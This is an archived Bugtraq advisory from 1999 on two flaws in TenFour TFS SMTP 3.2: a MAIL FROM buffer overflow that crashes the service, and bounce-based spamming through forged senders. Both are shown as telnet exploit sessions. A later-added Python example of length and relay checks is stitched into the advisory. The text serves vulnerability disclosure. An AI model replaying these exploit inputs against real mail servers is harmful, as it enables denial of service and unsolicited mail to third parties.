Bugtraq mailing list archives

[SECURITY] TenFour TFS SMTP 3.2 Buffer Overflow


From: christophe.lesur@INTRINSEC.COM (Christophe Lesur)
Date: Thu, 2 Sep 1999 22:39:23 +0200


 INTRINsec Security Advisory

Release Date    : August 30, 1999
Software        : TenFour TFS SMTP 3.2
Operating System: Windows NT 3.x / 4.x
Impact          : Attackers can use a misconfigured TFS SMTP for spamming
                  and can remotely crash the TFS SMTP Gateway.
Author          : Christophe.Lesur@INTRINsec.com
Status          : TenFour has been notified.
URLs            : http://www.intrinsec.com/

__ Digest __

The TenFour TFS SMTP Release 3.2 has two vulnerabilities: a buffer overflow
and, under some circumstances and due to the inherent TFS architecture, a way
to use it for spamming.

The direct results are that an attacker can remotely crash your TFS SMTP
Gateway or send unsolicited mail to someone (and to the TFS ADMINISTRATOR).

TenFour has been notified. Thanks to Roberto Correnti for his support.
(http://www.tenfour.com)

__ Technical Details and Exploits __

TENFOUR TFS SMTP Version 3.2 has two vulnerabilities: a buffer overflow and,
under some circumstances, it can be used for spamming.

First:  Buffer Overflow.

There is a major buffer overflow in TFS SMTP 3.2. When you connect to the
SMTP service on port 25, you get the TFS prompt. After sending the 'helo'
command, if you send a 'MAIL FROM' argument larger than 128 bytes, you will
crash the SMTP service with a nice protection fault. It is basically a buffer
overflow, and it has been fixed in release 4.0.

This is the exploit:

         [clesur@raptor clesur]$ telnet mailhost.victim.com 25
         Trying 1.1.1.1...
         Connected to mailhost.victim.com.
         Escape character is '^]'.
         220 mailhost.victim.com is ready. TFS SMTP Server ver 3.2
         helo
         250 mailhost.victim.com, Hello

         mail from:<ddddddddddddd ... lots of char ... dddddddddddddddd>

         Connection closed by foreign host.

Second: Spamming

The TFS SMTP Engine accepts any mail by default and processes it in its
kernel. In case of a deficient message (wrong recipient, wrong domain...),
TFS SMTP is usually configured to warn the sender and the TFS ADMINISTRATOR by
sending a 4-line warning AND the full message. Because there is no domain check
before the message is passed to the TFS core, it is possible to spam someone
and the TFS administrator: the gateway accepts a message it cannot deliver and
then mails a copy of it to whatever sender address was supplied.

This is the exploit:

          [clesur@raptor clesur]$ telnet mailhost.tfsvictim.com 25
          Trying 1.1.1.1...
          Connected to mailhost.tfsvictim.com.
          Escape character is '^]'.
          220 mailhost.tfsvictim.com is ready. TFS SMTP Server ver 3.2
          helo
          250 mailhost.tfsvictim.com, Hello
          mail from:<target@victim.com>
          250 Sender <target@victim.com> OK
          rcpt to:<target@victim.com>
          250 Recipient <target@victim.com> OK
          data
          354 Begin data transfer. End with period.
          from: target@victim.com
          to: target@victim.com

          <YOUR MESSAGE BODY HERE>
          .

          250 Message accepted
          quit
          221 Connection closed
          Connection closed by foreign host.

The spammed user will receive this message in their mailbox:

          Message 22:
          From target@victim.com Thu Jul 29 09:49:40 1999
          Delivered-To: target@victim.com
          From: target@victim.com
          Date: Thu, 29 Jul 1999 11:44:03 +0200
          Subject: <No subject>
          MIME-version: 1.0
          Content-transfer-encoding: quoted-printable

          ####################################################
          This message was not delivered to
          target@victim.com
          TFS Admin was informed with a copy of this message
          Sender was informed with a copy of this message
          ####################################################

          <YOUR MESSAGE BODY HERE>

__ Solutions __

For these vulnerabilities, TenFour suggests upgrading to a version greater
than 4.0.
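The two checks whose absence the advisory describes, written here as an added illustration (not TenFour's code): the MAIL FROM argument is length-bounded before it is parsed or copied, which is what a long sender address exploits in 3.2, and RCPT TO is refused for domains the gateway does not serve, so no warning copy is ever sent to a forged sender or the administrator. The 256-character limit is RFC 821's path limit; tfsvictim.com as the served domain is an assumption.

```python
import re

# Added illustration, not TenFour's code. Assumptions: RFC 821's 256-character
# path limit, and a constructed set of domains this gateway delivers for.
MAX_PATH_LEN = 256
LOCAL_DOMAINS = {"tfsvictim.com"}
_PATH_RE = re.compile(r"^<([^<>@\s]+)@([^<>@\s]+)>$")


class Envelope:
    """Per-session SMTP envelope state."""
    def __init__(self):
        self.helo = None
        self.sender = None
        self.recipients = []


def handle_command(env, line):
    """Return the reply for one client command and update env.
    Only HELO, MAIL and RCPT are modelled; anything else gets 500."""
    verb, _, arg = line.strip().partition(" ")
    verb = verb.upper()
    if verb == "HELO":
        env.helo = arg
        return "250 Hello"
    if verb in ("MAIL", "RCPT"):
        path = arg.partition(":")[2].strip()
        # Bound the length before any parsing or copying of the argument:
        # this is the check whose absence lets a long MAIL FROM crash 3.2.
        if len(path) > MAX_PATH_LEN:
            return "501 Path too long"
        m = _PATH_RE.match(path)
        if not m:
            return "501 Syntax error in path"
        if verb == "MAIL":
            env.sender = path[1:-1]
            return "250 Sender OK"
        # Refuse foreign domains at RCPT time: a message the gateway never
        # accepts cannot later produce a warning copy to a forged sender or
        # to the administrator, which is how the second issue is abused.
        if m.group(2).lower() not in LOCAL_DOMAINS:
            return "550 Relaying denied"
        env.recipients.append(path[1:-1])
        return "250 Recipient OK"
    return "500 Command not recognised"

def run_session(lines):
    """Feed a list of client command lines; return the gateway's replies."""
    env = Envelope()
    return [handle_command(env, l) for l in lines]
```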

__ Contacts __

 -- TenFour --

 TenFour South Europe 
 ITFamily Sarl 
 Le Technoparc 
 15, rue Edouard Jeanneret 
 78306 Poissy Cedex 
 France 
 Tel: +33 1 39 22 65 15 
 Fax: +33 1 39 11 49 77 
 WWW: http://www.tenfour.fr 

 -- INTRINsec --

 INTRINsec is a computer security company.
 http://www.INTRINsec.com
 This advisory is also available in French on our site.

__ DISCLAIMERS __

INTRINsec DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, AND PROVIDES
THIS INFORMATION "AS IS" WITHOUT WARRANTY OF ANY KIND. INTRINsec IS NOT
LIABLE FOR ANY DAMAGES WHATSOEVER EVEN IF INTRINsec HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.

--
Christophe Lesur        Security Consultant
INTRINsec
mailto:christophe.lesur@INTRINsec.com